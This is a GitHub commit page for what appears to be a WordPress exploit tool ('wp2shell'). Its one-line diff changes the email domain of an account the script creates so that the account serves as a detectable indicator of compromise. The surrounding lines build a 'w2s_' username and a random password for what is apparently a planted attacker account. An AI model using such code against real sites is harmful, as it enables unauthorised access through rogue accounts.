USE IT RESPONSIBLY

add an IoC ish for some of the malicious users. I know this isn't very robust, it's just slightly for lazy people.
This commit is contained in:
Sergio
2026-07-18 18:59:28 +03:00
committed by GitHub
parent 5e912a9305
commit adf12ec0cd
+1 -1
View File
@@ -278,7 +278,7 @@ if len(set(cache_post_ids)) != 3:
username = f"w2s_{token}" username = f"w2s_{token}"
password = f"W2s!{secrets.token_urlsafe(15)}" password = f"W2s!{secrets.token_urlsafe(15)}"
email = f"{username}@shellcode.lol" email = f"{username}@wp2shell.shellcode.lol"
outer_loop_id = 1800000000 + secrets.randbelow(100000000) outer_loop_id = 1800000000 + secrets.randbelow(100000000)
nav_item_id = outer_loop_id + 1 nav_item_id = outer_loop_id + 1
inner_loop_id = outer_loop_id + 2 inner_loop_id = outer_loop_id + 2